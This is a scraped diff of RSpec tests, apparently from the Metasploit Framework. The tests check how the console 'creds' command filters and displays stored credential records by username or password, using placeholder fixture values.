blank_priv = FactoryGirl.create(:metasploit_credential_password, data: blank_password)
|
||||
core = FactoryGirl.create(:metasploit_credential_core,
|
||||
origin: FactoryGirl.create(:metasploit_credential_origin_import),
|
||||
private: blank_priv,
|
||||
public: nonblank_pub,
|
||||
realm: nil,
|
||||
workspace: framework.db.workspace)
|
||||
end
|
||||
context "when the credential is present" do
|
||||
it "should show a user that matches the given expression" do
|
||||
db.cmd_creds("-u", username)
|
||||
@output.should =~ [
|
||||
"Credentials",
|
||||
"===========",
|
||||
"",
|
||||
"host service public private realm private_type",
|
||||
"---- ------- ------ ------- ----- ------------",
|
||||
" thisuser thispass Password",
|
||||
]
|
||||
end
|
||||
|
||||
it 'should match a regular expression' do
|
||||
subject.cmd_creds("-u", "^#{username}$")
|
||||
@output.should =~
|
||||
[
|
||||
"Credentials",
|
||||
"===========",
|
||||
"",
|
||||
"host service public private realm private_type",
|
||||
"---- ------- ------ ------- ----- ------------",
|
||||
" thisuser thispass Password",
|
||||
]
|
||||
end
|
||||
|
||||
it 'should return nothing for a non-matching regular expression' do
|
||||
subject.cmd_creds("-u", "^#{nomatch_username}$")
|
||||
@output.should =~
|
||||
[
|
||||
"Credentials",
|
||||
"===========",
|
||||
"",
|
||||
"host service public private realm private_type",
|
||||
"---- ------- ------ ------- ----- ------------",
|
||||
]
|
||||
end
|
||||
|
||||
context "and when the username is blank" do
|
||||
it "should show a user that matches the given expression" do
|
||||
db.cmd_creds("-u", blank_username )
|
||||
@output.should =~ [
|
||||
"Credentials",
|
||||
"===========",
|
||||
"",
|
||||
"host service public private realm private_type",
|
||||
"---- ------- ------ ------- ----- ------------",
|
||||
" nonblank_pass Password"
|
||||
]
|
||||
end
|
||||
end
|
||||
context "and when the password is blank" do
|
||||
it "should show a user that matches the given expression" do
|
||||
db.cmd_creds("-P", blank_password )
|
||||
@output.should =~ [
|
||||
"Credentials",
|
||||
"===========",
|
||||
"",
|
||||
"host service public private realm private_type",
|
||||
"---- ------- ------ ------- ----- ------------",
|
||||
" nonblank_user Password"
|
||||
]
|
||||
end
|
||||
end
|
||||
end
|
||||
context "when the credential is absent" do
|
||||
context "due to a nonmatching username" do
|
||||
it "should return a blank set" do
|
||||
db.cmd_creds("-u", nomatch_username)
|
||||
@output.should =~ [
|
||||
"===========",
|
||||
"Credentials",
|
||||
"",
|
||||
"---- ------- ------ ------- ----- ------------",
|
||||
"host service public private realm private_type"
|
||||
]
|
||||
end
|
||||
end
|
||||
context "due to a nonmatching password" do
|
||||
it "should return a blank set" do
|
||||
db.cmd_creds("-P", nomatch_password)
|
||||
@output.should =~ [
|
||||
"===========",
|
||||
"Credentials",
|
||||
"",
|
||||
"---- ------- ------ ------- ----- ------------",
|
||||
"host service public private realm private_type"
|
||||
]
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
describe "add-password" do
|
||||
context "when no core exists" do
|
||||
|
@ -94,44 +220,7 @@ describe Msf::Ui::Console::CommandDispatcher::Db do
|
|||
end
|
||||
end
|
||||
end
|
||||
describe "-u" do
|
||||
before(:each) do
|
||||
priv = FactoryGirl.create(:metasploit_credential_password, data: password)
|
||||
pub = FactoryGirl.create(:metasploit_credential_username, username: username)
|
||||
FactoryGirl.create(:metasploit_credential_core,
|
||||
private: priv,
|
||||
public: pub,
|
||||
realm: nil,
|
||||
workspace: framework.db.workspace)
|
||||
end
|
||||
|
||||
it 'should match a regular expression' do
|
||||
subject.cmd_creds("-u", "^#{username}$")
|
||||
@output.should =~
|
||||
[
|
||||
"Credentials",
|
||||
"===========",
|
||||
"",
|
||||
"host service public private realm private_type",
|
||||
"---- ------- ------ ------- ----- ------------",
|
||||
" username password Password",
|
||||
]
|
||||
end
|
||||
|
||||
it 'should return nothing for a non-matching regular expression' do
|
||||
subject.cmd_creds("-u", "^$")
|
||||
@output.should =~
|
||||
[
|
||||
"Credentials",
|
||||
"===========",
|
||||
"",
|
||||
"host service public private realm private_type",
|
||||
"---- ------- ------ ------- ----- ------------",
|
||||
]
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
describe "#cmd_db_export" do
|
Loading…
Reference in New Issue